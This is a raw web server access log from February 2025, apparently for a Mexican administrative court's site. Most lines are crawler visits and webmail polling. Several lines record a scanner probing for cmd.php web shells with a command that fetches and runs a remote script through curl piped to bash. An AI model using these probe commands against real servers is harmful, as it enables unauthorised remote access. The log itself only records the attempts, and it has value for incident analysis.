66.249.77.198 - - [05/Feb/2025:12:51:13 -0600] "GET /22281832876.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:51:29 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:51:34 -0600] "GET /files/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
187.195.110.68 - - [05/Feb/2025:12:51:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:51:40 -0600] "GET /278231661906.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.65 - - [05/Feb/2025:12:51:43 -0600] "GET /cardenas-batel-debera-rendir-cuentas-su-apellido-no-pesara-asm/view-box_2021/pdf/view-box_2021/pdf/Listas-de-Acuerdos HTTP/1.1" 301 355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.238 - - [05/Feb/2025:12:51:44 -0600] "GET /sisofi_2018/uploads/15-04-2023/pdf/view-box_2021/view-box_2021/pdf/Legislacion-Estatal-y-Federal HTTP/1.1" 301 334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:51:53 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:52:01 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
134.209.102.237 - - [05/Feb/2025:12:52:24 -0600] "GET /file/css/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
40.77.167.13 - - [05/Feb/2025:12:52:26 -0600] "GET /index.php?opc=propuesta/ HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:52:27 -0600] "GET /51708206895.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
134.209.102.237 - - [05/Feb/2025:12:52:30 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.72.140 - - [05/Feb/2025:12:52:32 -0600] "GET /sisofi/uploads/30-07-2018/JA-0409-2017-II.pdf HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.199 - - [05/Feb/2025:12:52:35 -0600] "GET /36315683766.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:52:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:52:54 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:52:55 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:53:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12365 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:53:02 -0600] "GET /class/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.200 - - [05/Feb/2025:12:53:03 -0600] "GET /837321135145.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
134.209.102.237 - - [05/Feb/2025:12:53:10 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
40.77.167.14 - - [05/Feb/2025:12:53:28 -0600] "GET /Noticias&idnoti=287&t=Modelo-digital-continuara-haciendo-util-al-Gobierno HTTP/1.1" 301 319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:53:30 -0600] "GET /280571272171.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:53:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:53:36 -0600] "GET /folders/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
51.222.253.3 - - [05/Feb/2025:12:53:36 -0600] "GET /Noticias?idnoti=130&t=Van-TJAM-y-ASM-por-reforma-a-Ley-de-Responsabilidades HTTP/1.1" 301 317 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.77.198 - - [05/Feb/2025:12:53:39 -0600] "GET /Resultados-Eventos HTTP/1.1" 301 256 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:53:55 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:53:55 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.209.102.237 - - [05/Feb/2025:12:53:59 -0600] "GET /403.shtml HTTP/1.1" 301 247 "-" "python-requests/2.32.3"
66.249.77.198 - - [05/Feb/2025:12:54:23 -0600] "GET /497461660488.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:54:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:54:50 -0600] "GET /042811529754.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.198 - - [05/Feb/2025:12:54:54 -0600] "GET /90472299843.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:54:56 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:55:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:55:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12362 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.72.141 - - [05/Feb/2025:12:55:22 -0600] "GET /?_ga=2.198040047.1958808748.1721886654-862398307.1699453578&_bdsid=2ulvIJ.n~ZXCIW.1721886656070.1721886848&_bd_prev_page=https://tjamich.gob.mx/detail.php?utam/j159987.html HTTP/1.1" 301 418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.200 - - [05/Feb/2025:12:55:22 -0600] "GET /786861233406.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.72 - - [05/Feb/2025:12:55:24 -0600] "GET /igualdad-de-genero-mujeres?q= HTTP/1.1" 301 267 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:12:55:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.199 - - [05/Feb/2025:12:55:50 -0600] "GET /77827169757.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:55:57 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:55:57 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.244.66.234 - - [05/Feb/2025:12:56:08 -0600] "GET /actividad-jurisdiccional/view-box_2021/view-box_2021/pdf/Consulta-de-Acuerdos-por-Numero-de-Expediente HTTP/1.1" 301 340 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:12:56:09 -0600] "GET /tribunal-de-justicia/calendario-oficial-de-labores/action%7Eoneday/exact_date%7E17-11-2018/pdf/view-box_2021/Tribunal-de-Justicia-Administrativa-de-Michoacan-de-Ocampo HTTP/1.1" 301 401 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:12:56:11 -0600] "GET /tribunal-de-justicia/calendario-oficial-de-labores/action%7Eoneday/request_format%7Ejson/view-box_2021/Tribunal-de-Justicia-Administrativa-de-Michoacan-de-Ocampo HTTP/1.1" 301 395 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
187.195.110.68 - - [05/Feb/2025:12:56:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:56:47 -0600] "GET /92177444478.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:56:58 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:57:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:57:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12364 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.200 - - [05/Feb/2025:12:57:14 -0600] "GET /262871330778.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:57:30 -0600] "GET /18761768859.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:57:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:57:41 -0600] "GET /90428725332.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:12:57:59 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 2213 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:58:08 -0600] "GET /43666122667.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:58:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:12:59:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12368 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:12:59:00 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 142 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:59:01 -0600] "GET /80946101422.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.199 - - [05/Feb/2025:12:59:29 -0600] "GET /82796898128.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:12:59:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:12:59:56 -0600] "GET /620041095592.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.116.142 - - [05/Feb/2025:13:00:01 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
216.244.66.234 - - [05/Feb/2025:13:00:02 -0600] "GET /legislacion/codigo-de-justicia-administrativa/pdf/pdf/view-box_2021/Transparencia-Proactiva HTTP/1.1" 301 329 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:13:00:03 -0600] "GET /legislacion/derechos-humanos/pdf/pdf/view-box_2021/Resultados-Noticias HTTP/1.1" 301 308 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:13:00:04 -0600] "GET /tribunal-de-justicia/calendario-oficial-de-labores/action%7Eoneday/exact_date%7E11-8-2018/view-box_2021/pdf/Ubicacion HTTP/1.1" 301 351 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.234 - - [05/Feb/2025:13:00:05 -0600] "GET /tribunal-de-justicia/calendario-oficial-de-labores/action%7Eoneday/exact_date%7E27-11-2018/view-box_2021/pdf/Directorio HTTP/1.1" 301 353 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.77.198 - - [05/Feb/2025:13:00:13 -0600] "GET /97233266559.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.198 - - [05/Feb/2025:13:00:23 -0600] "GET /87742219374.shtml HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:13:00:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 308 152 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.110.68 - - [05/Feb/2025:13:00:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:13:00:56 -0600] "GET /242481177083.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; GoogleOther)"
201.116.229.74 - - [05/Feb/2025:13:00:59 -0600] "-" 408 - "-" "-"
201.116.229.74 - - [05/Feb/2025:13:00:59 -0600] "-" 408 - "-" "-"
189.243.238.36 - - [05/Feb/2025:13:01:00 -0600] "POST /cpsess9781436776/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 12366 "https://webmail.tjamich.gob.mx/cpsess9781436776/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
187.195.116.142 - - [05/Feb/2025:13:01:03 -0600] "POST /cpsess3053937060/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess3053937060/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
189.243.238.36 - - [05/Feb/2025:13:01:14 -0600] "GET /intranet/ HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
185.50.170.186 - - [05/Feb/2025:13:01:14 -0600] "GET / HTTP/1.1" 301 247 "-" "Wget/1.20.3 (mingw32)"
66.249.77.200 - - [05/Feb/2025:13:01:17 -0600] "GET /106431100437.shtml HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.6834.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
187.195.110.68 - - [05/Feb/2025:13:01:35 -0600] "POST /cpsess0556275423/3rdparty/roundcube/?_task=mail&_action=refresh HTTP/1.1" 200 135 "https://webmail.tjamich.gob.mx/cpsess0556275423/3rdparty/roundcube/?_task=mail&_mbox=INBOX" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
66.249.77.198 - - [05/Feb/2025:13:01:40 -0600] "GET /855772828.shtml HTTP/1.1" 301 253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
